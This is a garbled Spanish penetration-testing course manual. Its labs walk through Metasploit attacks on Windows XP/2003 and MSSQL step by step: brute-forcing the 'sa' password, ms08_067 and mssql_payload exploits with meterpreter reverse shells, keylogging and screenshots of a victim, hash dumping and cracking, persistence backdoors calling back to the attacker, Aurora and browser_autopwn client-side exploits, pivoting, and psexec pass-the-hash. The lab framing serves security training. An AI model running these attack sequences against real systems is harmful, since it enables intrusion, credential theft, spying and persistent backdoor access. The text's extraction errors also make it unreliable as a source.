,notaci(n! (s altamente recomendable recomendable %ue si el estudiante no conoce como traba&a #SSQ/ Server, lo investigue por cuenta propia con el fin de me&orar los conocimientos relacionados con auditorias de sistemas intrusivas del tipo Penetration *esting, ya %ue durante la siguiente practica de laboratorio, va a comprometer a SQ/ Server, en lo %ue respecta a violentar la seguridad del motor de bases de datos, y del sistema operativo %ue lo contiene'' &7ecuci(n de la pr%ctica de la$oratorio =! Paso "! Scanning de Puertos y version del puerto TCP T "=<<! Si se tiene en cuenta los procesos de scanning de puertos reali.ados en laboratorios pasados, se puede observar %ue el puerto RP77 *CP est- en estado tado /istening (:bierto), esperando cone!iones, adem-s si se reali.a un proceso de scanning de puertos a este puerto en especial con la opci"n @s; s; de nmap, se puede apreciar %ue el servicio y versi"n %ue est-n detr-s de ese puerto, son #icrosoft SQl Server 566= SPR' Proceder a reali.ar el scanning de puertos, seg$n los comandos de la siguiente imagen'

Paso ;! 5dentificaci(n de vulnera$ilidades servicios MSSC)! (l siguiente paso es reali.ar un proceso de identificaci"n de vulnerabilidades, vulnerabilidades, para el caso vamos a buscar vulnerabilidades en el login y password del usuario S, -System ,dministrator. del sistema a de bases de datos #S@ #S SQ/ S(8;(8' Para lograr identificar vulnerabilidades en cuanto a credenciales de acceso d,biles, , podemos usar el siguiente siguient modulo au!iliar de metasploit llamado au'iliary6scanner6mss/l6mss/l8login Para poder usar este modulo, se debe debe reali.ar de forma secuencial lo siguiente0 use auxiliary/scanner/mss0l/mss0l_lo1in show options set $2!!_3#45 /pentest/passwords/6ohn/password.lst set RH !"! +,&.+7).+(8.&) 920u: colocas la direcci;n #$ de !ervidor %indows< set =5R> !5 false show options exploit
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Como se puede apreciar en las anteriores im-genes, en modulo au!iliar mss/l8login, logro identificar una contrase4a d,bil para el usuario S, -System ,dministrator.2 %ue para el caso, la contrase4a de acceso para el usuario S: es password 5r m%s all%! Para complementar este e&ercicio, insertar reali.ar un an-lisis de vulnerabilidades vulnerabili usando el Software <(SS2S, revisar en los reportes de este software, %ue se identifican otro tipo de vulnerabilidades criticas %ue pueden ser e!plotadas usando #etasploit Framewor ' Paso ;! 5dentificaci(n de vulnera$ilidades servicios DTTP! Con herramientas diversas %ue pueden encontrase en la versi"n de /inu! Hac trac , tambi,n pueden reali.arse procesos de an-lisis de vulnerabilidades' ;amos a utili.ar el software <(*C:* para reali.ar un simple
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

an-lisis de vulnerabilidades basado en la huella de identificaci"n de una aplicaci"n' Para poder usar netcat lan.amos el siguiente comando0 nc "B; "?A "<@ ;A A# (Colocar la direcci"n >P de su sistema 1indows Server) /ugo e&ecutamos el siguiente comando! D&,D 6 DTTP6" # )uego damos so$re enter2 y de$e de salir un mensa7e similar al siguiente!

(n la anterior imagen se puede observar perfectamente %ue el servidor web del e%uipo 1indows 5667 Server, es >>S S G'6, software %ue tiene much)simas vulnerabilidades conocidas y c"digos de e!plotaci"n para aprovecharse de dichas vulnerabilidades' Paso <! 5dentificaci(n de vulnera$ilidades servicios SM3! Con herramientas diversas %ue pueden encontrase en la versi"n de /inu! Hac trac , tambi,n pueden reali.arse procesos de an-lisis de vulnerabilidades' ;amos a utili.ar el software <#:P acompa4ado de uno de los script %ue e!isten para este software, con el fin de identificar vulnerabilidades ara el servicio S#H, puerto PP= *CP' Para poder usar nmap de la forma %ue lo necesitamos, lan.amos el siguiente comando0 nmap --script smb-chec.-vulns.nse vulns.nse -p--' +,&.+7).+(8.&) (8ecordar cambiar la direccion >P de su 1indows Server)

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

(n la anterior imagen se puede observar los resultados del comando e&ecutado, donde se puede observar %ue se identifico una vulnerabilidad en el puerto PP= *CP'

Pr%ctica de la$oratorio nEmero nEmer > 1&'plotaci(n 3%sica1

O$7etivos0 :provecharse de las vulnerabilidades encontradas en los pasos y servicios servic anteriores, con la configuraci"n y e&ecuci"n de (!ploits y P:M/O:DS del tipos Server Side :ecursos! ;#1:8(, #etasploit Framewor , 1indows Server 5667 y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 Server est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (s altamente importante tener conocimientos b-sicos@medios b-sicos medios al respecto de los servicios de red %ue se est-n atacando, para comprender me&or el traba&o de an-lisis de seguridad y+o penetration testing reali.ado' (sta pr-ctica tiene como ob&etivo principal, %ue el estudiando estudiando se vaya ambientando con la e&ecuci"n de e!ploits dentro de metasploit' /a vulnerabilidad #S 6F@69, 6F aun puede verse en n algunos e%uipos, pero en casos muy concretos y especiales, especiales tales como e%uipos OP@Server 5667 reci,n formateados, no parchados, , sin el firewall activo' (sta e!plotaci"n no puede hacerse desde la 1:<, por%ue los routers de los >SP blo%uean el trafico para puertos como el PP=,R7B, etc' (l (OP/O>* ms6F@69 69 es altamente utili.ado en las academias para cursos b-sicos y avan.ados de e hac ing, para poder ense4ar todas las funcionalidades de metasploit'

&7ecuci(n de la pr%ctica de la$oratorio >! >

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso "! &'plotaci(n ci(n de vulnera$ilidades servicios SM3! 2na ve. identificada las vulnerabilidades en diversos servicios de red, procedemos a reali.ar la respectiva e!plotaci"n de algunos de ellos %ue presentan vulnerabilidades conocidas' Para e!plotar la vulnerabilidad identificada entificada con <#:P y con <(SS2S descrita como #S6F@G9, #S6F G9, debemos reali.ar lo siguiente0 (Para el siguiente e&ercicio de e!plotaci"n, tener presente el siguiente es%uema0

>ngresar a metasploit, abriendo la interface msfconsole lan.ar el comando search netapi ne Seleccionamos el 5xploit exploit/windows/smb/ms*)_*78_netapi, y lo asignamos con el comando use windows6sm$6ms#A8#?@8netapi /uego se debe de indicar en la Shell de #(*:SP/O>* la opci"n s+ow options, para verificar las s opciones del tipo variable %ue se re%uiere en este e!ploit, para poder e!plotar la vulnerabilidad' (l resultado del comando, debe de ser similar al de la siguiente imagen0

Por lo anterior, se debe de identificar %ue se necesita el puerto *CP PP= abierto (;er resultados <#:P :nteriores), :nteriores), correspondiente al servicios C>FS+S#H, adem-s %ue se necesita la direcci"n >P del e%uipo victima asignada' Para asignar la direcci"n >P de la v)ctima , debemos de e&ecutar el siguiente comando0 set :DOST Direcci(n 5P *ictima (RB5'RGF'RRB'55= por (&emplo)'
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

/uego se debe de ingresar de nuevo el comando s+ow options para verificar %ue en efecto el valor de la direcci"n >P de la v)ctima fue asignado a la variables 83OS*' (l siguiente paso es verificar cuales son los P:M/O:D %ue pueden usarse con este est (!ploit, para lo cual daremos el siguiente comando0 s+ow payloads /uego se debe de elegir uno de los P:M/O:D disponibles, para el caso de este e&ercicio, y de las e!plicaciones presentadas en el Diplomado, vamos a elegir el siguiente payload0 windows6meterpreter6reverse8tcp terpreter6reverse8tcp Para asignar este P:M/O:D a nuestro (!ploit, se debe de e&ecutar el siguiente comando0 set $2?4 2@ windows/meterpreter/reverse_tcp /uego la Shell (Consola de #(*:SP/O>*), nos indica %ue el P:M/O:D se ha cargado' /uego debemos de dar el e comando s+ow options, para ver las opciones %ue se necesita asignar al P:M/O:D elegido' (l P:M/O:D elegido, necesita la variable /3OS*, &usto como se muestra en la siguiente imagen (/3OS*S3ost /ocal, de donde se lan.ara el (!ploit, para el caso es la >P del e%uipo /inu! Hac trac )

Para poder asignar el valor de la >P de Hac trac a la variables /3OS*, se debe de e&ecutar el siguiente comando0 set )DOST Direcci(n 5P 3acktrack -Ma/uina ,tacante. Se vuelve a ingresar el comando s+ow options, para ver er %ue en efecto la variable /3OS* %uedo con la direcci"n >P de Hac trac :signada' /uego ingresamos el comando s+ow targets, para verificar todos los sistemas 1indows %ue pueden ser e!plotados por este (!ploit' Si hasta a%u) todo va bien, no %ueda m-s %ue %ue lan.ar el ata%ue a la ma%uina victima (#a%uina Con 1indows OP M+O Server 5667 ya %ue ambas estan vulnerables)' vulnerables Para lan.ar el ata%ue, solo se debe de ingresar el siguiente comando0 e'ploit /uego de %ue el e!ploit, se e&ecuta el P:M/O:D %ue hemos elegido, de&-ndonos en la Shell de meterpreter de #(*:SP/O>*' *al y como se puede observar en la siguiente imagen0

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Meterpreter tiene muchas opciones, pero para el caso, vamos a usar la opci"n %ue me permite obtener una shell en el e%uipo v)ctima, lo cual podemos lograr ingresando el siguiente comando en la consola de meterpreter0 s+ell Fota! :ntes de lan.ar el comando shell, entrar al e%uipo v)ctima, como usuario final, y verificar por el administrador de tareas cuantos C#D'e!e hay e&ecut-ndose, luego hacer cer los mismo, pero despu,s de lan.ado el comando shell' /uego de e&ecutado el comando shell, el sistema debe de abrir la shell de 1indows OP y+o Server 5667 de la ma%uina victima (cmd@@shell), shell), &usto como se muestra en la siguiente imagen'

:notaci"n0 otaci"n0 si se presenta alg$n problema con la e&ecuci"n de la shell, digita desde la consola meterpreter el comando 1etsystem, para escalar privilegios en el sistema atacado' (l siguiente paso es crear algunas carpetas en la ra). del disco C0 del e%uipo v)ctima, usando el comando mkdir /uego se debe de ingresar al e%uipo v)ctima, como si fu,ramos un usuario normal del e%uipo, y verificar %ue en efecto se han creado las carpetas' (8ecordar crear la carpeta dentro del disco C, y no dentro de system75, para efectos de facilidad en la visuali.aci"n del directorio creado) Paso ;! &'plotaci(n de vulnera$ilidades servicios MSSC) Server! (n este segundo paso de e!plotaci"n del lado server side, vamos a aprovecharnos de la vulnerabilidad identificada con la clave e d,bil del usuario S: (System :dministrator de SQ/ Server), la cual es password' :dem-s %ue vamos a ir avan.ando en los procesos de post@e!plotaci"n post e!plotaci"n utili.ando las diferentes herramientas %ue nos ofrece meterpreter' Para e!plotar la vulnerabilidad en menci"n, men debemos de hacer lo siguiente0 (Para el siguiente e&ercicio de e!plotaci"n, tener presente el siguiente es%uema)

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

reali.ar desde msfconsole una b$s%ueda con el comando search mss0l /uego en los resultados %ue nos aparece en pantalla, seleccionar el e!ploit windows6mss/l6mss/l8payload ,signar al metasploit el uso del e!ploit en menci"n con el comando0 use windows/mss0l/mss0l_payload /uego vamos a buscar los P:M/O:DS disponibles para este e!ploit con el comando show payloads Seleccionamos el P:M/O:D windows6meterpreter6reverse8tcp /uego vamos a dar el comando s+ow options para poder ver las opciones %ue nos pide el (!ploit y el Payload seleccionado' /as variables a asignar son0 T a%u) ponemos la clave vulnerable, la cual es password P,SSGO:D @@T :DOST@@T a%u) colocamos la >P de la victima )DOST@@T a%u) colocamos la >P del atacante

*odas los valores a las anteriores variables, se asignan con el comando set finalmente cuando todas las variables est-n asignadas, se e&ecuta el comando e!ploit
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Hugando con Meterpreter! *eniendo presente %ue meterpreter tiene muchas funcionalidades, salimos de la consola de comandos msdos ((n caso de estarlo), y desde meterpreter, comen.amos a usar varios comandos'

2na ve. desde meterpreter, lan.ar los siguientes comandos0 Se debe de identificar los procesos del sistema afectado, lo cual podemos lograr con el comando ps, desde las shell de meterpreter' Posteriormente debemos de identificar con %ue proceso nos pudimos colar en el sistema victima 1indows 5667 Server' Server' /o cual podemos identificar e&ecutando el comando0 getpid2 desde las shell de meterpreter' /uego e&ecutamos de nuevo el comando ps e identificamos el nombre del proceso con %ue ingresamos al sistema v)ctima' (l siguiente paso es colocar en funcionamiento funcionamient un Ieylogger en el e%uipo v)ctima, para poder registrar las pulsaciones del teclado' Para lograr %ue el Ieylogger funcione de manera adecuada, se debe de hacer lo siguiente0 :brir en el e%uipo server 5667 el aplicativo notepad' ;olver al e%uipo atacante Hac trac y e&ecutar de nuevo el comando ps, para poder identificar con %ue 5D esta el notepad e&ecut-ndose' 2na ve. %ue se identifi%ue el >D del notepad, debemos de reali.ar un proceso de migraci"n del proceso con el cual hemos comprometido el sistema v)ctima, v) al proceso %ue e&ecuta el notepad en el mismo e%uipo v)ctima' /o anterior lo logramos con la e&ecuci"n del comando migrate, seguido del >D identificado del proceso notepad' Si sale alg$n mensa&e de error por cuestiones de permisos, entonces debemos de e&ecutar el comando getsystem, para poder escalar privilegios en la ma%uina v)ctima' ' /uego e&ecutar de nuevo el comando migrate, seguido del respectivo 5D, y ya debe de reali.ar una migraci"n e!itosa' (l siguiente paso es poner el eylogger en funcionamiento, funcionamiento, con el siguiente comando0 run keylogrecorder (sperar unos segundos, y comen.ar a escribir en el notepad de la v)ctima' /uego darle controlJc para detener el eylogger Finalmente usar el comando cat desde una Shell nueva de /inu!, para visuali.ar las capturas de teclas, en la ruta indicada por el registro del eylogger ,notaci(n! 8ecordar lan.ar el comando cat desde una consola (*eminal) de comandos diferente a la de metasploit tal y como se muestra en la siguiente imagen'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

(ntre otras de las opciones opci de meterpreter, tambi,n se puede registrar capturas de pantalla de la v)ctima con el comando screens+ot2 2 lo cual se puede lograr con los siguientes pasos! , y abrir el notepad y colocar lo siguiente0 >ngresar al e%uipo v)ctima, eta de cr,dito es0 R579GGGG y la clave es R57777 3ola, mi n$mero de tar&eta 2na ve. %ue escribamos eso, regresamos a la shell de meterprter (resultado en pasos anteriores de esta pr-ctica) en Hac trac y e&ecutamos el siguiente comando0 screens+ot De inmediato debe de salir en Hac trac , una copia de pantalla de la v)ctima, con lo cual el atacante podr- obtener informaci"n valiosa, y podrespiar a la v)ctima' Finali.ando esta paso del laboratorio, vamos a obtener todos los hash de los usuarios creados en el sistema v)ctima, lo cual cua podemos hacer con el comando +as+dump desde la consola meterpreter

/uego debemos de colocar estos estos hash en un archivo de te!to para luego proceder a reali.ar un proceso de crac de password' Podemos copiar y pegar los hashes en la ruta +pentest+passwords+&ohn' ' 2na ve. all) usamos el editor nano para guardar el archivo, y luego procedemos a e&ecutar el software crac eador ead de password &ohn the ripper, lo cual podemos po reali.ar con el siguiente comando! 67o+n +as+win

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Como se puede apreciar en la imagen, ima el passwords s de 1indows Server fue crac eado' ,notaci(n! /os hash obtenidos tambi,n se pueden copiar y pegar en el siguiente sitio web y all) tambi,n pueden ser crac eados' eados http0++www'md=decrypter'co'u

Sin embargo lo anterior puede e&ecutarse de de una me&or forma, y m-s f-cil usando metasploit, para los cual nos vamos vam a ayudar de dos m"dulos au!iliares es llamados0 au'iliary6analyKe67tr8crack8fast post6windows6gat+er6credentials6credential8collector

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Para poder e&ecutar estos dos m"dulos de forma paralela, , se debe de continuar e&ecutando los siguientes pasos0 desde msfconsole seleccionar el m"dulo au!iliar0 post+windows+gather+credentials+credentialAcollector (l anterior modulo se carga en metasploit metaspl con el siguiente comando0 use post/windows/1ather/credentials/credential_collector. post/windows/1athe /uego se da el comando show options y se observa %ue se le debe de indicar alguna de las sesiones %ue se tengan activas en el moento, %ue para el caso deber)amos de tener dos, una sesi"n para la e!plotaci"n d #SSQ/ y otra la e!plotaci"n S#H' indicar la sesi"n activa con el siguiente comando0 set S(SS>O< R /uego se e&ecuta el modulo au!iliar con el comando run Como se puede observar en el siguiente resultado del comando, se obtienen todos los hash de los usuarios de 1indows' 1indo

/uego se e&ecuta el modulo au!iliar de metasploit au!iliary6analyKe67tr8crack8fast, el cual nos sirve para hacerle crac a todos los passwords de los usuarios del sistema v)ctima, %ue para el caso es 1indows Server' Por $ltimo e&ecutamos el m"dulo au!iliar con el comando run

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Finalmente observamos %ue el m"dulos nos obtuvo todas las contrase4as (Darle paciencia para obtener las contrase4as, ya %ue se demora un poco)

Pr%ctica de la$oratorio nEmero nEmer ? 1Mas Meterpreter1

O$7etivos0 Conocer y utili.ar m-s funcionalidades de e meterpreter a nivel de e!plotaci"n y post@ e!plotacion' :ecursos! ;#1:8(, #etasploit Framewor , 1indows Server 5667, 5667, 1indows OP SP5 y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las las ma%uinas /inu! Hac trac y 1indows 5667 y OP, est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (s altamente importante tener conocimientos b-sicos@medios b-sicos medios al respecto de los servicios de red %ue se est-n atacando, para comprender comprender me&or el traba&o de an-lisis de seguridad y+o penetration testing reali.ado' (sta pr-ctica tiene como ob&etivo principal, %ue el estudiando se vaya ambientando con la e&ecuci"n de e e!ploits dentro de metasploit, y con la consola meterpreter

&7ecuci(n de la pr%ctica de la$oratorio ?! ? Paso "! Colocar una puerta trasera con meterpreter como servicio! *eniendo presente %ue meterpreter nos permite hacer much)simas tareas de e!plotaci"n y post@e!plotaci"n post e!plotaci"n en la ma%uina v)ctima, vamos a proceder a de&ar de&ar a meterpreter como una puerta trasera en la ma%uina v)ctima, para %ue nos permita conectarnos a la victima cada %ue necesitemos hacerlo, y no dependa la e!plotaci"n directamente de una vulnerabilidad conocida, ya %ue esta puede ser solventada por el administrador admi de red' Para lograr esta tarea, se debe de hacer lo siguiente0 (star en una consola meterpreter, la cual se lora con la e!plotaci"n de alguna vulnerabilidad conocida en la victima'
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

(&ecutar el siguiente comando para colocar meterpreter como un servicios en la m-%uina victima, los cual se logra e&ecutando el siguiente comando0 run metsvc A2 /uego debemos de e&ecutar el e!ploit multi+handler, , lo cual se logra e&ecutando el siguiente comando! use e'ploit6multi6+andler Posteriormente selecciona el siguiente P:M/O:D windows6metsvc8$ind8tcp Para asignar este P:M/O:D al e!ploit, se e&ecuta el siguiente comando0 set $2?4 2@ windows/metsvc_bind_tcp windows/metsvc_bind_tcp. /uego se le asignan las variables al e!ploit, %ue para el caso son 83OS* y el puerto en el cual %uedo a la escucha el servicio de meterpreter /uego se e&ecuta el e!ploit

persistente Paso ;! Colocar una puerta trasera con meterpreter como servicio persistente! *eniendo presente %ue meterpreter nos permite hacer much)simas tareas de e!plotaci"n y post@e!plotaci"n e!plotaci"n en la ma%uina ma%uina v)ctima, vamos a proceder a de&ar un servicios persistente %ue este llamando al atacante por un puerto determinado, determ y cada tiempo determinado, lo cual se logra reali.ando lo siguiente0 e&ecutar el siguiente comando0 run persistence -, -S -4 4 -i ?# -p =<;" Lr "B; "?A >? "#" (8ecordar %ue a%u) se coloca la >P de Hac trac , %ue serdiferente para cada estudiante) (/o /o %ue hace el comando anterior, es b-sicamente lo siguiente0 siguiente Con la opci"n @ , se coloca una cone!i"n a la escucha en la ma%uina del atacante, atacant la opci"n -S garanti.a %ue la puerta trasera %ue colocamos se inicie cada ve. %ue la ma%uina victima 1indows arran%ue' Con la opci"n -i se asigna un intervalo de tiempo para la cone!i"n de la victima hacia el atacante, , con la opci"n -p asignamos un puerto puer en la ma%uina del atacante, , y la opci"n -r indica la direcci"n >P el atacante donde esta una cone!i"n a la escucha)

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Pr%ctica de la$oratorio nEmero nEmero @ 1&'plotaci(n 3%sica1 del lado del cliente
O$7etivos0 :prender c"mo traba&an y se e&ecutan los procesos procesos de e!plotaci"n del lado del cliente (Client Sie) :ecursos! ;#1:8(, #etasploit tasploit Framewor , 1indows OP SP5 y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 y OP, est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (s altamente importante tener conocimientos b-sicos@medios b-sicos medios al respecto de los servicios de red %ue se est-n atacando, para comprender me&or el traba&o de an-lisis de seguridad y+o penetration testing reali.ado' (sta pr-ctica tiene como ob&etivo principal, %ue el estudiando se vaya ambientando con la e&ecuci"n de e!ploits dentro de metasploit, y con la consola meterpreter

&7ecuci(n de la pr%ctica de la$oratorio @! @ Paso "! &'plotaci(n taci(n de 5nternet &'plorer -,urora)0 Comen.ando con los procesos de e!plotaci"n del lado del cliente, vamos a usar un e!ploit %ue se aprovecha de una vulnerabilidad conocida da en >nternet e!plorer, conocida como operacion aurora' aurora Para e&ecutar este e!ploit, debemos de reali.a lo siguiente0 Seleccionar el e!ploit e'ploit6windows6$rowser6ms"#8##;8aurora :signarlo a la consola con el comando0 e'ploit6windows6$rowser6ms"#8##;8aurora seleccionar un P:M/O:D, para el caso vamos a usar set windows/meterpreter/reverse_tcp erpreter/reverse_tcp set 28>P:*3 + set /3OS* RB5'RGF'77'R5B set /PO8* PP7 e!ploit

use payload

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso ;! &'plotaci(n de navegadores con el modulo 3rowser autopwn0 Continuando ntinuando con los procesos rocesos de e!plotaci"n del lado, lado, ahora vamos a configurar el e!ploit llamado use au'iliary6server6$rowser8autopwn liary6server6$rowser8autopwn, el cual se aprovecha de vulnerabilidades conocidas de varios navegadores' Para e&ecutar este e!ploit, debemos de reali.a lo siguiente0

Seleccionar el e'ploit au'iliary6server6$rowser8autopwn :signar este e!ploit con el comando coman use Para asignar este e!ploit, debemos de e&ecutar el siguiente comando0 use e'ploit au'iliary6server6$rowser8autopwn /uego se debe de asignar la varia$le )DOST y la varia$le 4:5P,TD Finalmente se le da el comando e!ploit, y se le env)a a la victima la 28/ del servidor web %ue acaba de cargar metasploit' ,notaci(n! hay %ue darle un poco de paciencia a la e&ecuci"n de este e!ploit ya %ue lan.a varios c"digos de e!plotaci"n y al final nos muestra las sesiones %ue logro abrir en la m-%uina v)ctima'

Pr%ctica de la$oratorio nEmero nEmer A 1Pivoting1

O$7etivos0 :prender c"mo se reali.a el proceso proceso de pivoting entre dos subrede :ecursos! ;#1:8(, #etasploit tasploit Framewor , 1indows Server1indows 1indows OP SP5 y Hac trac = O$servaciones!
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

:ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 y OP, est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (sta pr-ctica debe de hacerse desde dos ma%uinas f)sicas, P ma%uinas virtuales ,notaci(n general al de la pr%ctica A! Para la siguiente practica, se debe de tener presente el siguiente escenario0

Fota! *ener presente %ue en el es%uema anterior los puntos ro&os representan dos tar&etas de red en el servidor 1indows 5667, cada una de ellas debe de esta configurada con diferentes subredes (Segmentos de red)' /a %ue est- conectada al segmento de red %ue est- en bridge, esta suministrada directamente por el servidor D3CP de la ma%uina local' M la otra tar&eta podemos asignarle una direcci"n >P como la R6'6'6'R mascara 5=='5=='5=='6' *ener presente primero prender el 1indows server y renombrar la tar&eta de red actual como 1:<, y la otra %ue se va a crear, se renombra como /:<' /:< &s altamente importante ensayar /ue el si se presente ping entre los diferentes diferen segmentos de red antes de comenKar la pr%ctica Pasos para e7ecutar la pr%ctica! /os pasos %ue se deben de reali.ar paso para poder lograr el proceso de pivoting en la ma%uina victima (1indows OP ;ictima final) es el siguiente0 ". /o primero es configurar igurar las tar&etas de red para el laboratorio, las cuales se configuran de la siguiente manera0
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Gindows Server! debe de tener dos tar&etas de red una conectada en modo bridge, y la segunda la vamos a conectar en modo ;#<(*5' Uusto como se puede apreciar en la siguiente imagen'

8ecordar %ue la %ue est- en bridge, obtiene D3CP por medio de la red /:<, y la %ue est- en ;#<(*5 se le configura manualmente una R6'6'6'R+5P' /uego se configura la ma%uina 1indows OP y la tar&eta de red tambi,n la colocamos como co ;#<(*5, y asignamos otra Direcci"n >P del mismo rango %ue en 1indows server, la cual puede ser R6'6'6'RR+5P' *ener presente colocarle en la configuraci"n de la tar&eta de red de 1indows OP como servidor D<S y puerta de enlace la direcci"n >P de 1indows Server' 5) 2na ve. configuradas las tar&etas de red, el siguiente paso es integrar a 1indows OP al dominio %ue se encuentra en 1indows Server 5667' 7) (l tercer paso es vulnerar a 1indows Server por su tar&eta de red configurada en modo Hridge' /o anterior or se hace desde /inu! H*=' 8ecordar %ue H*= debe de estar configurado tambi,n en modo Hridge, y por el segmento de red de 1indows Server' Se recomienda usar un e!ploit al cual sea vulnerable, y en el P:M/O:D usar 1indows #eterpreter 8everse *CP' P) (l cuarto uarto paso es averiguar cuantas tar&etas de red tiene el e%uipo v)ctima, y la configuraci"n de estas' Si todo va hasta a%u) bien, se deben de identificar 5 tar&etas de red' red :dicionalmente desde meterpreter se puede lan.ar el comando run arp8scanner Lr "# # # #6;= Con el anterior comando se puede identificar otros host conectados al segmento de red alterno del servidor 5667' =) Salir de meterpreter con el comando $ackground para proceder a agregar una ruta a nuestra ma%uina, lo cual hacemos con el siguiente siguie comando0 route add "# # # # ;>> ;>> ;>> # " -o7o el ultimo " pertenece a la sesi(n /ue se a$ri( con Meterpreter. /uego damos el comando route print para ver la ruta'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Si se presentan problemas con adicionar la ruta, se puede optar por los siguientes comandos0 run autorun L+ y luego run autoroute Ls s "# # # #6;= O tambi,n puede usarse el modulo au!iliar llamado post6windows6manage6autoroute' (ste nos va a solicitar la sesi"n abierta y la subred a la cual %ueremos enrutarnos ?. 2na ve. %ue se tiene la a ruta, el siguiente paso es sacar los 3ash de los usuarios del dominio llamado #(*:SP/O>*' /o o anterior ya se vio en pr-cticas de laboratorio pasadas' @. (l siguiente paso es buscar host activos en la red, para lo cua podemos hacer uso del modulo au!iliar de #etasploit llamado! au'iliary6scanner6portscan6tcp' (ste m"dulo nos pide los puertos, %ue para el caso vamos a darle F6,R7=,R7B,PP=, y nos pide la v)ctima, v)ctima %ue para el caso solo vamos a comen.ar el Scanning desde la >P R6'6'6'R hasta la R6'6'6'R=' /uego le damos run, y si todo va bien, debemos de ver la >P R6'6'6'RR, perteneciente a 1indows OP, con todos sus respectivos puertos abiertos' )anKar e'ploit! A. Se puede proceder a lan.ar de nuevo el e!ploit <(*:P>, pero esta ve. se reali.a contra el e%uipo 1indows OP, pero esta ve. se debe de e&ecutar el P:M/O:D meterpreter6$ind8tcp Optativo! )anKar otro e'ploit! B. *ambi,n podemos lan.ar otro ata%ue al protocolo S#H, lo cual podemos reali.ar con el P:M/O:D llamado0 e'ploit6windows6sm$6pse'ec' Cuando seleccionemos ccionemos este P:M/O:D, se le deben de asignar las siguientes variables (*ener presente %ue para este e!ploit se re%uiere de los hash %ue obtuvieron en pasos anteriores de esta pr-ctica)' :DOST0 R6'6'6'RR SM34ser administrator SM3Pass se le coloca el hash obtenido en puntos anteriores de esta pr-ctica (O&o copiar y Pegar el 3:S3, en lo %ue respecta al contenido %ue esta antes de 000) SM3Domain (Colocar el nombre del dominio, el cual debe de ser #(*:SP/O>*) M por $ltimo el P:M/O:D, el cual es #eterpreter+bindAtcp' #eterpreter+bi Finalmente se e&ecuta con el comando run

www dsteamseguridad com